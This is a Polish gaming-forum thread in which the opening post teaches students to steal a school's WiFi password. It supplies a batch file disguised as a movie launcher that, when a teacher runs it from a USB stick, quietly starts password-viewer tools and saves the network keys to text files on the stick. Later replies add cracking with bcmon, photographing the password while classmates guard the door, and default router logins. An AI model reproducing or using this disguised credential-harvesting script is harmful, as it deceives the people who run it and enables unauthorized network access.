Skocz do zawartości
  • 👋 Witaj na MPCForum!

Przeglądasz forum jako gość, co oznacza, że wiele świetnych funkcji jest jeszcze przed Tobą! 😎

• Pełny dostęp do działów i ukrytych treści
    • Możliwość pisania i odpowiadania w tematach
    • System prywatnych wiadomości
    • Zbieranie reputacji i rozwijanie swojego profilu
    • Członkostwo w jednej z największych społeczności graczy

👉 Dołączenie zajmie Ci mniej niż minutę – a zyskasz znacznie więcej!

Zarejestruj się teraz

Odczytanie hasła do WiFi w szkole - "Proszę pani ja ten film mogę przynieść"

Hubertus323f

Rekomendowane odpowiedzi

Opublikowano

Witam. Dosyć często przynosiłem filmy do szkoły i stwierdziłem, że trzeba to wykorzystać. Co nam jest potrzebne? Tylko paczka z linku  i plik bat którym uruchamiamy film (jest w paczce, ale my musimy go edytować - Klikamy na niego prawym przyciskiem i "Edytuj")

1. Pobieramy paczkę. SKAN (Skan jest dla pliku z zippyshare. w nowym zipie jest w 99,9% to samo. Te same programy do odczytywania hasła tylko plik bat zawiera to co jest w poście, a wcześniej miał podane inne nazwy plików tylko) - Oczywiście antywirusy widzą, żę jest to "HackTool" (musi mieć dostęp do plików widnowsa... Spokojnie. To żadne typowe trojany)

2. Po pobraniu i wypakowaniu pliku mamy 1 plik i 1 folder:

- Uruchom film.bat

- Inne

3. Kopiujemy je na naszego pendrive.

4. Teraz czas na edycję pliku bat! Klikamy na niego prawym przyciskiem i wybiermay "Edytuj". Ukaże nam się kod. Musimy go wyedytować

@echo off
title MPCForum.pl
cd %cd%

color 4a
echo Uruchomiono: %time%

echo _____________________________________________________________________
echo 1. ROMEO I JULIA 2
echo 2. ROMEO I JULIA 1
ECHO _____________________________________________________________________
if /i %processor_architecture%==AMD64 GOTO AMD64
if /i %PROCESSOR_ARCHITEW6432%==AMD64 GOTO AMD64
if /i %processor_architecture%==x86 GOTO x86
GOTO ERR
:AMD64
   start %cd%\Inne\x64.exe /stext %cd%\Inne\x64.txt
   start %cd%\Inne\x86.exe /stext %cd%\Inne\x86.txt
set /p x="Wybierz numer i zatwierdz: "
if '%x%'=='1' start %cd%\Inne\x1.flv
if '%x%'=='2' start %cd%\Inne\x2.flv
GOTO EXEC
:x86
   start %cd%\Inne\x86.exe /stext %cd%\Inne\x86only.txt
set /p x="Wybierz numer i zatwierdz: "
if '%x%'=='1' start %cd%\Inne\x1.flv
if '%x%'=='2' start %cd%\Inne\x2.flv

Wyjaśnienie kolorów:

TEN kolor to nazwa naszego filmu. Wpisujemy ją z rozszerzeniem... (Rozszerzenie znajdziemy we właściwościach pliku), natomiast sam plik musi znajdować się w folderze "Inne" na pendrive.

TEN kolor to tytuł naszego filmu. Możemy wpisać co tylko chcemy

Natomiast podkreślone linie możemy całkowicie usunąć jeżeli mamy tylko jeden film.

Jak to działa? Przy uruchamianiu otwiera nam 2 programy (w wersji 64 bit) lub 1 (w wersji 32 bit) zależnie od architektury systemu. Pliki z hasłem możemy odczytać sobie np. w domu. Noszą one nazwę x64.txt oraz x86.txt i będą znajdowały się w folderze inne. Hasło jest zapisanie w lini "Key (Ascii)       : xxxx".

Mam nadzieję, że TuT będzie przydatny dla osób które chcą zdobyć hasło do wifi...

Działa na:

Windows 7 x86
Windows 7 x64

Nie działa na:

Windows 10 TP x86
Windows 10 TP x64

Reszty nie sprawdziłem.

• 2 miesiące temu...
Opublikowano

bezsens trochę , trzeba i tak mieć prawa administratora by uruchomić plik  a mając je i tak odczyta się hasło w ok ... 10 s   

właściwości sieci wifi 

kliknąć  : pokaz znaki i... 

mamy hasło 

If you = stupid then

insert(foot.in.your.ass)

end if

licznik-54-96732-stat.png

• 3 tygodnie później...
Opublikowano

Tak, lecz u mnie w szkole wyświetlamy obraz rzutnikiem wiec niema jak wejsc w wlasciwosci sieci.

GJ

Jeżeli pomogłem podziękuj klikając Lubie to! <3

sygna1.png

Opublikowano

Takie sobie, bo tak jak kolega wyżej napisał.

Staram sie pomagac innym uzytkownikom.

Obecnie siedze w dziale ELEKTRONIKA-OPROGRAMOWANIE.

Jesli piszesz cos do mnie oznacz mnie

Gdy pomagam w jakims temacie, staram sie doprowadzic do konca.Dajac mi LAJKA mozesz mnie zachecicc ;)

• 3 tygodnie później...
Opublikowano

U mnie w szkole odpalamy filmy odtwarzaczem dvd i leci na telewizorze :x ale tak jak kolega wyżej pisał właściwości itp itd i pokaż znaki :D

Pomogłem? Daj +

• 2 tygodnie później...
Opublikowano

Dobry poradnik, nie powiem bardzo przydatna rzecz, jednakże u mnie to się nie zda, ponieważ wszystkie komputery są podpięte pod sieć serwerową. Aby uruchomić ten plik trzeba by najprawdopodobniem posiadać konto z uprawnieniami "Administratorskimi" Informatyk w mojej sieci bardzo dobrze wszystko pozabezpieczał, sieć wi-fii jest chroniona protokołem, aby się połączyć trzeba wcisnąć guziczek na routrze który jest pod masą kabli. PS: daje LIKE.

Opublikowano

@TajemnikTV

@Hubertus323f

Czy mógłbyś zrobić reupload, proszę? :-)

jutro :) jak mam jeszcze na dysku :D brat mi ze swojego notebooka usunal te pliki dlatego opoznienie... co nie zmienia faktu, ze zrobienie ponownie tego wszystkiego zajelo mi 5 minut i po prostu leniwy bylem ;-;

@RobeM

bezsens trochę , trzeba i tak mieć prawa administratora by uruchomić plik  a mając je i tak odczyta się hasło w ok ... 10 s   

właściwości sieci wifi 

kliknąć  : pokaz znaki i... 

mamy hasło 

nie zrobisz tego przy nauczycielu. a tym bardziej takiego hasla nie spiszesz... A jak mu powiesz zeby uruchomil ten plik o nazwie "jakistamfilm" to to zrobi :P  Ja nie musialem tego robic (ale testowalem)  gdyz haslo sb bcmonem złamałem :P Btw. Nasz informatyk coś śpał. ustawił hasło "koral" xD

Btw. w mniejszych szkolach nauczyciele maja swoje note/netbooki ewentualnie szkolne ale maja uprawnienia administratora... Ja w podstawówce (tak bardzo rok temu :D ) wlazłem do naszej sali gdzie był puszczony film na zakończenie 6 kl, 2 kolegów pilnowało drzwi a ja zrobiłem zdjęcie hasła... potem przepisaliśmy itd. ma je prawie cała tamta szkola (chodze do innej) a hasła nadal nie zmienili. + żaden nauczyciel się nic nie skapnal. a neta to tam maja niezlego. pobieralo mi pliczki po 40mb/s podczas gdy połowa szkoły na necie była :D

Opublikowano

totalna starta czasu < wystarczy kliknąć na sieć i 'pokaż hasło'

Zrób to przy nauczycielu i jeszcze spisz hasło to osobiście Ci pogratuluję.

Reup będzie jutro kiedy odzyskam lapka z plikami do tego. obecnie z poprzedniego posta można pobrać.

Opublikowano

totalna starta czasu < wystarczy kliknąć na sieć i 'pokaż hasło'

Nie zawsze taka opcja jest dostępna dla nauczycieli :D, u mnie w szkole jest to dobrze poblokowane więc trzeba się troszku pomęczyć aby odczytać hasło do wi-fii. 

Metoda kolegi wyżej działa pomimo braku uprawnień w kontach nauczycieli, polecam. :)

Opublikowano

Działa, szkoda tylko że na Windows 8.1 wyświetla się że trzeba uprawnienia administratorskie do odpalenia **** Network Wirless ***, a jak mają taki sam antyvirus jak ja, to wykryje Im passwd viever :P

Opublikowano

Działa, szkoda tylko że na Windows 8.1 wyświetla się że trzeba uprawnienia administratorskie do odpalenia **** Network Wirless ***, a jak mają taki sam antyvirus jak ja, to wykryje Im passwd viever :P

Za to na win 10 wcale nie działa xD

Kurde ja o tym nie pomyślałem - zawsze miałem te ostrzeżenia w windowsie wyłączone a nauczyciele to tumoki i nie wyłączą... Ale cóż... Pozostaje bcmon XDD

• 2 miesiące temu...
  • 2 tygodnie później...
  • 3 miesiące temu...
  • 2 tygodnie później...
Opublikowano

Potwierdza ktoś działanie na XP?

Tak, wiem. Szkoła starodawna :D

Pamiętaj!

Pisząc do mnie, dodaj

@kuba1300000

na sam początek postu.

W przeciwnym wypadku raczej tego nie przeczytam!

• 2 miesiące temu...
Opublikowano

Jak macie informatyke w szkole to wpisujecie w przegladarke 192.168.1.1 i potem logujecie sie l:admin h:admin  i macie pasy...

Opublikowano

Biedactwo, musiałeś chyba nauczyć się na pamięć instrukcji obsługi jednego routera że tak dobrze zapamiętałeś hasła i adres do kilku typów  modeli routerów. 

Mózg to nie mydło; nie ubędzie Ci go, gdy go użyjesz.

Zarchiwizowany

Ten temat przebywa obecnie w archiwum. Dodawanie nowych odpowiedzi zostało zablokowane.

• Dodaj nową pozycję...